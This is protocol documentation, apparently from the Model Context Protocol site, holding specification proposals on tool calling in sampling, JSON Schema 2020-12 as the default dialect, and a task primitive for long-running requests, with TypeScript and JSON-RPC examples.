* OpenAI: `parallel_tool_calls: false` (top-level param)
* Anthropic: `tool_choice.disable_parallel_tool_use: true`
* Preferred here as default value if unset is false (e.g. parallel tool calls allowed)
* OpenAI vs. Anthropic API re/ `tool_choice` `"none"` vs. `tools`:
* OpenAI: `tools: [$Foo], tool_choice: "none"` forbids any tool call
* Preferred behaviour here
* Anthropic: `tools: [$Foo], tool_choice: {mode: "none"}` may still call tool `Foo`
* Gemini vs. OAI / Anthropic re/ `disable_parallel_tool_use`:
* Gemini API has no way to disable parallel tool calls atm (unlike OAI / Anthropic APIs). Removing this flag for now, to be reintroduced when Gemini has any way of supporting it. Otherwise clients would get unexpected multiple tool calls (or alternatively if implemented that way, unexpected failures / costly retry until a single tool call is emitted)
* Gemini API's [Function calling modes](https://ai.google.dev/gemini-api/docs/function-calling?example=meeting#function_calling_modes) have an `ANY` value that should match the proposed `required`
* [SamplingMessage](https://modelcontextprotocol.io/specification/2025-06-18/schema#samplingmessage):
```typescript theme={null}
/*
BEFORE:
interface SamplingMessage {
content: TextContent | ImageContent | AudioContent
role: Role;
}
*/
type SamplingMessage = UserMessage | AssistantMessage; // NEW
type AssistantMessageContent =
| TextContent
| ImageContent
| AudioContent
| ToolUseContent;
type UserMessageContent =
| TextContent
| ImageContent
| AudioContent
| ToolResultContent;
interface AssistantMessage {
// NEW
role: "assistant";
content: AssistantMessageContent | AssistantMessageContent[];
}
interface ToolUseContent {
// NEW
type: "tool_use";
name: string;
id: string;
input: object;
}
interface UserMessage {
// NEW
role: "user";
content: UserMessageContent | UserMessageContent[];
}
interface ToolResultContent {
// NEW
_meta?: { [key: string]: unknown };
type: "tool_result";
toolUseId: string;
content: ContentBlock[];
structuredContent: object;
isError?: boolean;
}
```
* Notes:
* Differences of role vs. content type when it comes to tool calling between APIs:
* OpenAI: `role: “system" | “user" | “assistant" | “tool"` (where tool is for tool results), while tool calls are nested in assistant messages, content is then typically null but some “OpenAI compatible” APIs accept non-null values
* ```typescript theme={null}
[
{ role: "user", content: "what is the temperature in london?" },
{
role: "assistant",
content: "Let me use a tool...",
tool_calls: [
{
id: "call_1",
type: "function",
function: {
name: "get_weather",
arguments: '{"location": "London"}',
},
},
],
},
{
role: "tool",
content: '{"temperature": 20, "condition": "sunny"}',
tool_call_id: "call_1",
},
];
```
* Claude API: `role: “user" | “assistant"`, tool use and result are passed through specially-typed message content parts:
* ```typescript theme={null}
[
{
"role": "user",
"content": [
{
"type": "text",
"text": "what is the temperature in london?"
}
},
{
"role": "assistant",
"content": [
{
"type": "text",
"text": "Let me use a tool..."
},
{
"type": "tool_use",
"id": "call_1",
"name": "get_weather",
"input": {"location": "London"}
}
]
},
{
"role": "user",
"content": [
{
"type": "tool_result",
"tool_call_id": "call_1",
"content": {"temperature": 20, "condition": "sunny"}
}
]
}
]
```
* Gemini API:
* `function` role (similar to OAI's `tool` role)
* No tool call id concept ([function calling](https://ai.google.dev/gemini-api/docs/function-calling?example=meeting#parallel_function_calling): Gemini requires tool results to be provided in the exact same order as the tool use parts. An implementation could generate the tool call ids and use them to reorder the tool results if needed.
* [CreateMessageResult](https://modelcontextprotocol.io/specification/2025-06-18/schema#createmessageresult)
```typescript theme={null}
/*
BEFORE:
interface CreateMessageResult {
_meta?: { [key: string]: unknown };
content: TextContent | ImageContent | AudioContent;
role: Role;
stopReason?: string;
[key: string]: unknown;
}
*/
interface CreateMessageResult {
_meta?: { [key: string]: unknown };
content: AssistantMessageContent | AssistantMessageContent[] // UPDATED
role: "assistant"; // UPDATED
stopReason?: “endTurn" | "stopSequence" | “toolUse" | “maxToken" | string // UPDATED
[key: string]: unknown;
}
```
* Notes:
* Backwards compatibility issue: returning CreateMessageResult.content as an array of contents OR a single content is problematic, so we propose:
* `sampling/createMessage` MUST NOT return an array in `CreateMessageResult.content` before spec version Nov 2025.
* This guarantees wire-level backwards-compatibility
* Existing code that uses sampling may break w/ new SDK releases as it will need to test content to know if it's an array or a single block, and act accordingly.
* This seems reasonable(?)
* `CreateMessageResult.stopReason` field is currently defined as an open `string`, and the spec only mentions the `endTurn` as example value.
* OpenAI vs. Anthropic API idioms
* Finish/stop reason
* OpenAI’s [ChatCompletion](https://platform.openai.com/docs/api-reference/chat/object): `finish_reason: “stop” | “length” | “tool_use”` (…?)
* [Anthropic](https://docs.claude.com/en/api/handling-stop-reasons): `stop_reason: “end_turn” | “max_tokens” | “stop_sequence” | “tool_use” | “pause_turn” | “refusal”`
## Possible Follow ups
Theses are out of scope for this SEP, but care was taken not to preclude them, so where appropriate we give examples of how they could be implemented on top of / after this SEP.
### Streaming support
See: [Streaming tool use results #117](https://github.com/modelcontextprotocol/modelcontextprotocol/issues/117)
This could be important for some longer-running use cases or when latency is important, but would play better w/ streaming support in MCP tools.
A possible way to implement this would be to use notifications w/ payload, and possibly create a new method `sampling/createMessageStreamed`. Both should be orthogonal w/ this SEP (but we'd need to create delta types for results, similar to streaming APIs in inference API such as Claude API and OpenAI API).
### Cache friendliness updates
Two bits needed here:
* Introduce cache awareness
* Implicit caching guidelines phrased as SHOULDs
* Explicit cache points and TTL semantics [as in the Claude API](https://docs.claude.com/en/docs/build-with-claude/prompt-caching)? (incl. beta behaviour for longer caching)
* Pros: easy to implement *for at least 1 implementor (Anthropic)*
* Cons: if hard to implement for others, unlikely to get approval.
* “Whole prompt” / prompt-prefix cache w/ an explicit key [as in the OpenAI API](https://platform.openai.com/docs/api-reference/responses/create#responses-create-prompt_cache_key)?
* Pros:
* simpler for users (no need to think about where the shared prefix stops)
* implicitly supports updating the cache (maybe even as subtree)
* Cons: possibly harder to implement / more storage inefficient
* Introduce allowed\_tools feature to enable / disable tools w/o breaking context caching
* Relevant to this SEP as we may want to merge this feature [under the tool\_choice field, similar to what OpenAI did](https://platform.openai.com/docs/guides/function-calling).
```typescript theme={null}
interface ToolChoice { // NEW
mode?: “auto” | "required";
allowed_tools?: string[]
}
```
### Allow client to call the server’s tools by itself in an agentic loop
From the server’s perspective, that would remove the need to call tools by itself / inject tool results in follow up sampling calls.
The MCP server would just allowlist its own tools in the sampling request, w/t a dedicated tool definition such as:
```typescript theme={null}
{
type: "server-tool"; // MCP tool from same server.
name: string;
}
```
Pros:
* Safe, limited to that server’s tools.
* If we propagate the mcp-session-id, can leverage keep any server-side session context / caching
### Allow client to call any other MCP servers’ tools by itself in an agentic loop
Although this sounds similar to the previous one (allow only same server’s tools), this option wouldn’t need a protocol change / could be entirely done by the client as an implementation detail of their sampling support.
The end user would allowlist tools from any other MCP server for use in a sampling request, without the server having to ask for anything. The client UI would e.g. display a tool selection UI as part of the sampling approval flow, auto enabling tools from same server by default.
Pros:
* Technically no spec change needed (if anything, mention this as a freedom clients have)
* Possibly similar to what [CreateMessageRequest.params.includeContext](https://modelcontextprotocol.io/specification/2025-06-18/schema#createmessagerequest) = thisServer / allServers intended semantics may have meant
* `CreateMessageRequest.params.allowImplicitToolCalls = “none” | “thisServer” | “allServers”`
(assuming we wanted to give the server any control over this)
Cons:
* Classifier might be needed to avoid High potential for privacy leaks / abuse
* If user approves Gmail MCP tool usage / delegation by mistake, server gets access to their private emails through sampling
### Allow server to list & call clients’ tools (client/server → p2p)
If we say the client can now expose tools that the server can call, it opens a set of possibilities:
* The client can “forward” other servers’ tools (maybe w/ some namespacing for seamless aggregation)
* The server can then call these tools as part of its tool loop.
* Client & Server semantics start to lose weight, we enter a more peer-to-peer, symmetrical relationship
* Client could also ask a server for sampling, while we’re at it
* Symmetry at the protocol layer, but still directionality at the transport layer (e.g. for HTTP transport, direction of POST requests still matters)
### Simplify structured outputs use case
A major use case of sampling is to get outputs that conform to a given schema.
This is possible in [OpenAI’s API](https://platform.openai.com/docs/guides/structured-outputs) for instance.
The most common workaround is to give a single tool and set `tool_choice: "required"`, which guarantees the output is a ToolCall containing inputs that conform to the tool’s input schema.
While this SEP proposes we enable this `"required"`-based workaround, as a follow up it would be great to provide more explicit / simpler JSON schema support, which would also allow schema types not allowed in tool inputs (which require an object w/ properties, so one has to pick at least a name for their outputs, which requires thinking / interplay w/ the prompting strategy):
```typescript theme={null}
interface CreateMessageRequest {
method: “sampling/createMessage”;
params: {
messages: SamplingMessage[];
...
format: {
type: "json_schema",
"schema": {
"type": "array",
"minItems": 5,
"maxItems": 100
}
}
}
```
# SEP-1613: Establish JSON Schema 2020-12 as Default Dialect for MCP
Source: https://modelcontextprotocol.io/community/seps/1613-establish-json-schema-2020-12-as-default-dialect-f
Establish JSON Schema 2020-12 as Default Dialect for MCP
Final
Standards Track
| Field | Value |
| ------------- | ------------------------------------------------------------------------------- |
| **SEP** | 1613 |
| **Title** | Establish JSON Schema 2020-12 as Default Dialect for MCP |
| **Status** | Final |
| **Type** | Standards Track |
| **Created** | 2025-10-06 |
| **Author(s)** | Ola Hungerford |
| **Sponsor** | None |
| **PR** | [#1613](https://github.com/modelcontextprotocol/modelcontextprotocol/pull/1613) |
***
## Abstract
This SEP establishes JSON Schema 2020-12 as the default dialect for embedded schemas within MCP messages (tool `inputSchema`/`outputSchema` and elicitation `requestedSchema` fields). Schemas may explicitly declare alternative dialects via the `$schema` field. This resolves ambiguity that has caused compatibility issues between implementations.
## Motivation
The MCP specification does not explicitly state which JSON Schema version to use for embedded schemas. This has caused:
* Validation failures between clients and servers assuming different versions
* Implementation divergence across SDK ecosystems
* Developer uncertainty requiring arbitrary version choices
Community discussion (GitHub Discussion #366, PR #655) revealed that implementations were split between draft-07 and 2020-12, with multiple maintainers and community members expressing strong preference for 2020-12 as the default.
## Specification
### 1. Default Dialect
Embedded JSON schemas within MCP messages **MUST** conform to [JSON Schema 2020-12](https://json-schema.org/draft/2020-12/schema) when no `$schema` field is present.
### 2. Explicit Dialect Declaration
Schemas **MAY** include an explicit `$schema` field to declare a different dialect:
```json theme={null}
{
"$schema": "https://json-schema.org/draft/2020-12/schema",
"type": "object",
"properties": {
"name": { "type": "string" }
}
}
```
### 3. Schema Validation Requirements
* Schemas **MUST** be valid according to their declared or default dialect
* The `inputSchema` field **MUST NOT** be `null`
**For tools with no parameters**, use one of these valid approaches:
* `true` - accepts any input (most permissive)
* `{}` - equivalent to `true`, accepts any input
* `{ "type": "object" }` - accepts any object with any properties
* `{ "type": "object", "additionalProperties": false }` - accepts only empty objects `{}`
**Example** for a tool with no parameters:
```json theme={null}
{
"name": "get_current_time",
"description": "Returns the current server time",
"inputSchema": {
"type": "object",
"additionalProperties": false
}
}
```
### 4. Scope of Application
This specification applies to:
* `tools/list` response: `inputSchema` and `outputSchema`
* `prompts/elicit` request: `requestedSchema`
* Future MCP features embedding JSON Schema definitions
### 5. Implementation Requirements
**Servers MUST:**
* Generate schemas conforming to 2020-12 by default
* Include explicit `$schema` when using non-default dialects
**Clients MUST:**
* Validate schemas according to declared or default dialect
* Support at least JSON Schema 2020-12
## Rationale
### Why 2020-12?
1. **Ecosystem alignment**: Python SDK (via Pydantic) and Go SDK implementations prefer/use 2020-12
2. **Modern features**: Better validation capabilities and composition support
3. **Community preference**: Multiple maintainers and community members in PR #655 discussion advocated for 2020-12 over draft-07
4. **Current standard**: 2020-12 is the stable version as of 2025
### Why allow explicit declaration?
* Supports migration paths for existing schemas
* Provides flexibility without protocol changes
* Follows JSON Schema best practices
### Alternatives considered
* **Draft-07 as default**: Rejected after community feedback; older version with less capability
* **No default**: Rejected as unnecessarily verbose; adds boilerplate
* **Multiple equal versions**: Rejected; creates unpredictability and fragmentation
## Backward Compatibility
This is technically a **clarification**, and not a breaking change:
* Existing schemas without `$schema` default to 2020-12
* Servers can add explicit `$schema` during transition
* Basic schemas (type, properties, required) work across versions
**Migration may be needed for schemas assuming draft-07 by default:**
* Schemas using `dependencies` (→ `dependentSchemas` + `dependentRequired`)
* Positional array validation (→ `prefixItems`)
**Migration strategy:** Add explicit `$schema: "http://json-schema.org/draft-07/schema#"` during transition, then update to 2020-12 features.
## Reference Implementation
### SDK Implementations
**Python SDK** - Already compatible:
* Uses Pydantic for schema generation
* Pydantic defaults to 2020-12 via `.model_json_schema()`
**Go SDK** - Implemented 2020-12:
* Explicit 2020-12 implementation completed
* Confirmed by @samthanawalla in PR #655 discussion
**Other SDKs:**
* May require updates but based on other examples, there should be straightforward or out-of-the-box options to support this. I can add more examples here or we can create issues to follow up on these after acceptance.
## Security Implications
No specific security implications have been identified from establishing 2020-12 as the default dialect. The clarification reduces ambiguity that could lead to validation mismatches between implementations, which is a minor security improvement through increased predictability.
Implementations should use well-maintained JSON Schema validator libraries and keep them updated, as with any dependency.
## Related Work
### [SEP-1330: Elicitation Enum Schema Improvements](https://github.com/modelcontextprotocol/modelcontextprotocol/issues/1330)
**SEP-1330** proposes deprecating the non-standard `enumNames` property in favor of JSON Schema 2020-12 compliant patterns. This work is directly enabled by establishing 2020-12 as the default dialect.
**Implementation Consideration:**\
As noted in SEP-1330 discussion, there is some concern about parsing complexity with advanced JSON Schema features like `oneOf` and `anyOf`. However, these features are part of the JSON Schema standard and well-supported by mature validator libraries. Implementations can balance standards compliance with their parsing needs by using well-tested JSON Schema validation libraries.
### [SEP-834: Full JSON Schema 2020-12 Support](https://github.com/modelcontextprotocol/modelcontextprotocol/issues/834)
This SEP establishes the foundation (default dialect) while SEP-834 addresses comprehensive support for 2020-12 features.
## Open Questions
The schema for the spec itself references `draft-07` and the `typescript-json-schema` package we use to generate it only supports draft-07.
Options:
1. Update schema generation script to patch to 2020-12 after generation (this is what I did in the current PR)
2. Switch to a different schema generator that supports 2020-12
3. Leave as-is since it doesn't actually conflict with the spec?
Personally I'd prefer (1) in the short term and then (2) as a follow-up.
# SEP-1686: Tasks
Source: https://modelcontextprotocol.io/community/seps/1686-tasks
Tasks
Final
Standards Track
| Field | Value |
| ------------- | ------------------------------------------------------------------------------- |
| **SEP** | 1686 |
| **Title** | Tasks |
| **Status** | Final |
| **Type** | Standards Track |
| **Created** | 2025-10-20 |
| **Author(s)** | Surbhi Bansal, Luca Chang |
| **Sponsor** | None |
| **PR** | [#1686](https://github.com/modelcontextprotocol/modelcontextprotocol/pull/1686) |
***
## Abstract
This SEP improves support for task-based workflows in the Model Context Protocol (MCP). It introduces both the **task primitive** and the associated **task ID**, which can be used to query the state and results of a task, up to a server-defined duration after the task has completed. This primitive is designed to augment other requests (such as tool calls) to enable call-now, fetch-later execution patterns across all requests for servers that support this primitive.
## Motivation
The current MCP specification supports tool calls that execute a request and eventually receive a response, and tool calls can be passed a progress token to integrate with MCP’s progress-tracking functionality, enabling host applications to receive status updates for a tool call via notifications. However, there is no way for a client to explicitly request the status of a tool call, resulting in states where it is possible for a tool call to have been dropped on the server, and it is unknown if a response or a notification may ever arrive. Similarly, there is no way for a client to explicitly retrieve the result of a tool call after it has completed — if the result was dropped, clients must call the tool again, which is undesirable for tools expected to take minutes or more. This is particularly relevant for MCP servers abstracting existing workflow-based APIs, such as AWS Step Functions, Workflows for Google Cloud, or APIs representing CI/CD pipelines, among other applications.
Today, it is possible for individual MCP servers to represent tools in a way that enables this, with certain compromises. For example, a server may expose a `long_running_tool` and wish to support this pattern, splitting it into three separate tools to accommodate this:
1. `start_long_running_tool`: This would start the work represented by `long_running_tool` and return a tracking token of some kind, such as a job ID.
2. `get_long_running_tool_status(token)`: This would accept the tracking token and return the current status of the tool call, informing the caller that the operation is still ongoing.
3. `get_long_running_tool_result(token)`: This would accept the tracking token and return the result of the tool call, if it is available.
Representing a tool in this way seems to solve for the use case, but it introduces a new problem: Tools are generally-expected to be orchestrated by an agent, and agent-driven polling is both unnecessarily expensive and inconsistent — it relies on prompt engineering to steer an agent to poll at all. In the original `long_running_tool` case, the client had no way of knowing if a response would ever be received, while in the `start_long_running_tool` case, the application has no way of knowing if the agent will orchestrate tools according to the specific contract of the server.
It is also impossible for the host application to take ownership of this orchestration, as this tool-splitting is both conventions-based and may be implemented in different ways across MCP servers — one server may have three tools for one conceptual operation (as in our example), or it may have more, in the case of more complex, multi-step operations.
On the other hand, if active task polling is not needed, existing MCP servers can fully-wrap a workflow API in a single tool call that polls for a result, but this introduces an undesirable implementation cost: an MCP server wrapping an existing workflow API is a server that only exists for polling other systems.
**Affected Customer Use Cases**
These concerns are backed by real use cases that Amazon has seen both internally and with their external customers (identities redacted where non-public):
**1. Healthcare & Life Sciences Data Analysis**
***Challenge:*** Amazon’s customers in the healthcare and life sciences industry are attempting to use MCP to wrap existing computational tools to analyze molecular properties and predict drug interactions, processing hundreds of thousands of data points per job from chemical libraries through multiple inference models simultaneously. These complex, multi-step workflows require a way to actively check statuses, as they take upwards of several hours, making retries undesirable.
***Current Workaround:*** Not yet determined.
***Impact:*** Cannot integrate with real-time research workflows, prevents interactive drug discovery platforms, and blocks automated research pipelines. These customers are looking for best practices for workflow-based tool calls and have noted the lack of first-class support in MCP as a concern. If these customers do not have a solution for long-running tool calls, they will likely forego MCP and continue using their existing platforms.
***Ideal:*** Concurrent and poll-able tool calls as an answer for operations executing in the range of a few minutes, and some form of push notification system to avoid blocking their agents on long analyses on the order of hours. This SEP supports the former use case, and offers a framework that could extend to support the latter.
**2. Enterprise Automation Platforms**
***Challenge:*** Amazon’s large enterprise customers are looking to develop internal MCP platforms to automate SDLC processes across their organizations, extending to sales, customer service, legal, HR, and cross-divisional teams. They have noted they have long-running agent and agent-tool interactions, supporting complex business process automation.
***Current Workaround:*** Not yet determined. Considering an application-level system outside of MCP backed by webhooks.
***Impact:*** Limitations related to the host application being unaware of tool execution state prevent complex business process automation and limit sophisticated multi-step operations. These customers want to dispatch processes concurrently and collect their results later, and are noting the lack of explicit late-retrieval as a concern — and are considering involved application-level notification systems as a possible workaround.
***Ideal:*** Built-in mechanisms for actively checking the status of ongoing work to avoid needing to implement notification systems specific to their own tool conventions themselves.
**3. Code Migration Workflows**
***Challenge*:** Amazon has automated code migration and transformation tools to perform upgrades across its own codebases and those of external customers, and is attempting to wrap those tools in MCP servers. These migrations analyze dependencies, transform code to avoid deprecated runtime features, and validate changes across multiple repositories. These migrations range from minutes to hours depending on migration scope, complexity, and validation requirements.
***Current Workaround:*** Developers implement manual tracking by splitting a job into `create` and `get` tools, forcing models to manage state and repeatedly poll for completion.
***Impact:*** Poor developer experience due to needing to replicate this hand-rolled polling mechanism across many tools. One team had to debug an issue where the model would hallucinate job names if it hadn’t listed them first. Validating that this does not happen across many tools in a large toolset is time-consuming and error-prone.
***Ideal:*** Support natively polling tool state at the data layer to support pushing a tool to the background and avoiding blocking other tasks in the chat session, while still supporting deterministic polling and result retrieval. The team needs the same pattern across many tools in their MCP servers, and wants a common solution across them, which this SEP directly supports.
**4. Test Execution Platforms**
***Challenge:*** Amazon’s internal test infrastructure executes comprehensive test suites including thousands of cases, integration tests across services, and performance benchmarks. They have built an MCP server wrapping this existing infrastructure.
***Current Workaround:*** For streaming test logs, the MCP server exposes a tool that can read a range of log lines, as it cannot effectively notify the client when the execution is complete. There is not yet any workaround for executing test runs.
***Impact:*** Cannot run a test suite and stream its logs simultaneously without a single hours-long tool call, which would time out on either the client or the server. This prevents agents from looking into test failures in an incomplete test run until the entire test suite has completed, potentially hours later.
***Ideal:*** Support host application-driven tool polling for intermediate results, so a client can be notified when a long-running tool is complete. This SEP does not fully-support this use case (it does enable polling), but the Task execution model can be extended to do so, as discussed in the “Future Work” section.
**5. Deep Research**
***Challenge:*** Deep research tools spawn multiple research agents to gather and summarize information about topics, going through several rounds of search and conversation turns internally to produce a final result for the caller application. The tool takes an extended amount of time to execute, and it is not always clear if the tool is still executing.
***Current Workaround:*** The research tool is split into a separate `create` tool to create a report job and a `get` tool to get the status/result of that job later.
***Impact:*** When using this with host applications, the agent sometimes runs into issues calling the `get` tool repeatedly — in particular, it calls the tool once before ending its conversation turn, claiming to be "waiting" before calling the tool again. It cannot resume until receiving a new user message. This also complicates expiration times, as it is not possible to predict when the client will retrieve the result when this occurs. It is possible to work around this by adding a `wait` tool for the model, but this prevents the model from doing anything else concurrently.
***Ideal:*** Support polling a tool call’s state in a deterministic way and notify the model when a result is ready, so the tool result can be immediately retrieved and deleted from the server. Other than notifying the model (a host application concern), this SEP fully supports this use case.
**6. Agent-to-Agent Communication (Multi-Agent Systems)**
***Challenge:*** One of Amazon’s internal multi-agent systems for customer question answering faces scenarios where agents require significant processing time for complex reasoning, research, or analysis. When agents communicate through MCP, slow agents cause cascading delays throughout this system, as agents are forced to wait on their peers to complete their work.
***Current Workaround:*** Not yet determined.
***Impact:*** Communication pattern creates cascading delays, prevents parallel agent processing, and degrades system responsiveness for other time-sensitive interactions.
***Ideal:*** Some method to allow agents to perform other work concurrently and get notified once long-running tasks complete. This SEP supports this use case by enabling host applications to implement background polling for select tool calls without blocking agents.
These use cases demonstrate that a mechanism to actively track tool calls and defer results is a real requirement for these types of MCP deployments in production environments.
**Integration with Existing Architectures**
Many workflow-driven systems already provide active execution-tracking capabilities with built-in status metadata, monitoring, and data retention policies. This proposal enables MCP servers to expose these existing APIs with thin MCP wrappers while maintaining their existing reliability.
**Benefits for Existing Architectures:**
* **Leverage Existing State Management:** Systems like AWS Step Functions, Workflows for Google Cloud, and CI/CD platforms already maintain execution state, logs, and results. MCP servers can expose these systems' existing APIs without pushing the responsibility of polling to a fallible agent.
* **Preserve Native Monitoring:** Existing monitoring, alerting, and observability tools continue to work unchanged. The execution happens almost entirely within the existing workflow-management system.
* **Reduce Implementation Overhead:** Server implementers don't need to build new state management, persistence, or monitoring infrastructure. They can focus on the MCP protocol mapping of their existing APIs to tasks.
This SEP simplifies integration with existing workflows and allows workflow services to continue to manage their own state while delivering a quality customer experience, rather than offloading to agent-polling or building MCP servers that do nothing but poll other services.
## Specification
This SEP introduces a mechanism for requestors (which can be either clients or servers, depending on the direction of communication) to augment their requests with **tasks**. Tasks are durable state machines that carry information about the underlying execution state of the request they wrap, and are intended for requestor polling and deferred result retrieval. Each task is uniquely identifiable by a requestor-generated **task ID**.
### 1. User Interaction Model
Tasks are designed to be **application-driven**—receivers tightly-control which requests (if any) support task-based execution and manage the lifecycles of those tasks; meanwhile, requestors own the responsibility for augmenting requests with tasks, and for polling on the results of those tasks.
Implementations are free to expose tasks through any interface pattern that suits their needs—the protocol itself does not mandate any specific user interaction model.
### 2. Capabilities
Servers and clients that support task-augmented requests **MUST** declare a `tasks` capability during initialization. The `tasks` capability is structured by request category, with boolean properties indicating which specific request types support task augmentation.
Refer to [https://github.com/modelcontextprotocol/modelcontextprotocol/pull/1732](https://github.com/modelcontextprotocol/modelcontextprotocol/pull/1732) for details.
### 3. Protocol Messages
#### 3.1. Creating Tasks
To create a task, requestors send a request with the `modelcontextprotocol.io/task` key included in `_meta`, with a `taskId` value representing the task ID. Requestors **MAY** include a `keepAlive`, with a value representing how long after completion the requestor would like the task results to be kept for.
**Request:**
```json theme={null}
{
"jsonrpc": "2.0",
"id": 1,
"method": "some_method",
"params": {
"_meta": {
"modelcontextprotocol.io/task": {
"taskId": "786512e2-9e0d-44bd-8f29-789f320fe840",
"keepAlive": 60000
}
}
}
}
```
#### 3.2. Getting Tasks
To retrieve the state of a task, requestors send a `tasks/get` request:
**Request:**
```json theme={null}
{
"jsonrpc": "2.0",
"id": 3,
"method": "tasks/get",
"params": {
"taskId": "786512e2-9e0d-44bd-8f29-789f320fe840",
"_meta": {
"modelcontextprotocol.io/related-task": {
"taskId": "786512e2-9e0d-44bd-8f29-789f320fe840"
}
}
}
}
```
**Response:**
```json theme={null}
{
"jsonrpc": "2.0",
"id": 3,
"result": {
"taskId": "786512e2-9e0d-44bd-8f29-789f320fe840",
"keepAlive": 30000,
"pollFrequency": 5000,
"status": "submitted",
"_meta": {
"modelcontextprotocol.io/related-task": {
"taskId": "786512e2-9e0d-44bd-8f29-789f320fe840"
}
}
}
}
```
#### 3.3. Retrieving Task Results
To retrieve the result of a completed task, requestors send a `tasks/result` request:
**Request:**
```json theme={null}
{
"jsonrpc": "2.0",
"id": 4,
"method": "tasks/result",
"params": {
"taskId": "786512e2-9e0d-44bd-8f29-789f320fe840",
"_meta": {
"modelcontextprotocol.io/related-task": {
"taskId": "786512e2-9e0d-44bd-8f29-789f320fe840"
}
}
}
}
```
**Response:**
```json theme={null}
{
"jsonrpc": "2.0",
"id": 4,
"result": {
"content": [
{
"type": "text",
"text": "Current weather in New York:\nTemperature: 72°F\nConditions: Partly cloudy"
}
],
"isError": false,
"_meta": {
"modelcontextprotocol.io/related-task": {
"taskId": "786512e2-9e0d-44bd-8f29-789f320fe840"
}
}
}
}
```
#### 3.4. Task Creation Notification
When a receiver creates a task, it **MUST** send a `notifications/tasks/created` notification to inform the requestor that the task has been created and polling can begin.
**Notification:**
```json theme={null}
{
"jsonrpc": "2.0",
"method": "notifications/tasks/created",
"params": {
"_meta": {
"modelcontextprotocol.io/related-task": {
"taskId": "786512e2-9e0d-44bd-8f29-789f320fe840"
}
}
}
}
```
The task ID is conveyed through the `modelcontextprotocol.io/related-task` metadata key. The notification parameters are otherwise empty.
This notification resolves the race condition where a requestor might attempt to poll for a task before the receiver has finished creating it. By sending this notification immediately after task creation, the receiver signals that the task is ready to be queried via `tasks/get`.
Receivers that do not support tasks (and thus ignore task metadata in requests) will not send this notification, allowing requestors to fall back to waiting for the original request response.
#### 3.5. Listing Tasks
To retrieve a list of tasks, requestors send a `tasks/list` request. This operation supports pagination.
**Request:**
```json theme={null}
{
"jsonrpc": "2.0",
"id": 5,
"method": "tasks/list",
"params": {
"cursor": "optional-cursor-value"
}
}
```
**Response:**
```json theme={null}
{
"jsonrpc": "2.0",
"id": 5,
"result": {
"tasks": [
{
"taskId": "786512e2-9e0d-44bd-8f29-789f320fe840",
"status": "working",
"keepAlive": 30000,
"pollFrequency": 5000
},
{
"taskId": "abc123-def456-ghi789",
"status": "completed",
"keepAlive": 60000
}
],
"nextCursor": "next-page-cursor"
}
}
```
#### 3.6 Deleting Tasks
To explicitly delete a task and its associated results, requestors send a `tasks/delete` request.
**Request:**
```json theme={null}
{
"jsonrpc": "2.0",
"id": 6,
"method": "tasks/delete",
"params": {
"taskId": "786512e2-9e0d-44bd-8f29-789f320fe840",
"_meta": {
"modelcontextprotocol.io/related-task": {
"taskId": "786512e2-9e0d-44bd-8f29-789f320fe840"
}
}
}
}
```
**Response:**
```json theme={null}
{
"jsonrpc": "2.0",
"id": 6,
"result": {
"_meta": {
"modelcontextprotocol.io/related-task": {
"taskId": "786512e2-9e0d-44bd-8f29-789f320fe840"
}
}
}
}
```
### 4. Behavior Requirements
These requirements apply to all parties that support receiving task-augmented requests.
#### 4.1. Task Support and Handling
1. Receivers that do not support task augmentation on a request **MUST** process the request normally, ignoring any task metadata in `_meta`.
2. Receivers that support task augmentation **MAY** choose which request types support tasks.
#### 4.2. Task ID Requirements
1. Task IDs **MUST** be a string value.
2. Task IDs **SHOULD** be unique across all tasks controlled by the receiver.
3. The receiver of a request with a task ID in its `_meta` **MAY** validate that the provided task ID has not already been associated with a task controlled by that receiver.
#### 4.3. Task Status Lifecycle
1. Tasks **MUST** begin in the `submitted` status when created.
2. Receivers **MUST** only transition tasks through the following valid paths:
1. From `submitted`: may move to `working`, `input_required`, `completed`, `failed`, `cancelled`, or `unknown`
2. From `working`: may move to `input_required`, `completed`, `failed`, `cancelled`, or `unknown`
3. From `input_required`: may move to `working`, `completed`, `failed`, `cancelled`, or `unknown`
4. Tasks in `completed`, `failed`, `cancelled`, or `unknown` status **MUST NOT** transition to any other status (terminal states)
3. Receivers **MAY** move directly from `submitted` to `completed` if execution completes immediately.
4. The `unknown` status is a terminal fallback state for unexpected error conditions. Receivers **SHOULD** use `failed` with an error message instead when possible.
**Task Status State Diagram:**
```mermaid theme={null}
stateDiagram-v2
[*] --> submitted
submitted --> working
submitted --> terminal
working --> input_required
working --> terminal
input_required --> working
input_required --> terminal
terminal --> [*]
note right of terminal
Terminal states:
• completed
• failed
• cancelled
• unknown
end note
```
#### 4.4. Input Required Status
1. When a receiver sends a request associated with a task (e.g., elicitation, sampling), the receiver **MUST** move the task to the `input_required` status.
2. The receiver **MUST** include the `modelcontextprotocol.io/related-task` metadata in the request to associate it with the task.
3. When the receiver receives all required responses, the task **MAY** transition out of `input_required` status (typically back to `working`).
4. If multiple related requests are pending, the task **SHOULD** remain in `input_required` status until all are resolved.
#### 4.5. Keep-Alive and Resource Management
1. Receivers **MAY** override the requested `keepAlive` duration.
2. Receivers **MUST** include the actual `keepAlive` duration (or `null` for unlimited) in `tasks/get` responses.
3. After a task reaches a terminal status (`completed`, `failed`, or `cancelled`) and its `keepAlive` duration has elapsed, receivers **MAY** delete the task and its results.
4. Receivers **MAY** include a `pollFrequency` value (in milliseconds) in `tasks/get` responses to suggest polling intervals. Requestors **SHOULD** respect this value when provided.
#### 4.6. Result Retrieval
1. Receivers **MUST** only return results from `tasks/result` when the task status is `completed`.
2. Receivers **MUST** return an error if `tasks/result` is called for a task in any other status.
3. Requestors **MAY** call `tasks/result` multiple times for the same task while it remains available.
#### 4.7. Associating Task-Related Messages
1. All requests, notifications, and responses related to a task **MUST** include the `modelcontextprotocol.io/related-task` key in their `_meta`, with the value set to an object with a `taskId` matching the associated task ID.
2. For example, an elicitation that a task-augmented tool call depends on **MUST** share the same related task ID with that tool call's task.
#### 4.8. Task Cancellation
1. When a receiver receives a `notifications/cancelled` notification for the JSON-RPC request ID of a task-augmented request, the receiver **SHOULD** immediately move the task to the `cancelled` status and cease all processing associated with that task.
2. Due to the asynchronous nature of notifications, receivers **MAY** not cancel task processing instantaneously. Receivers **SHOULD** make a best-effort attempt to halt execution as quickly as possible.
3. If a `notifications/cancelled` notification arrives after a task has already reached a terminal status (`completed`, `failed`, `cancelled`, or `unknown`), receivers **SHOULD** ignore the notification.
4. After a task reaches `cancelled` status and its `keepAlive` duration has elapsed, receivers **MAY** delete the task and its metadata.
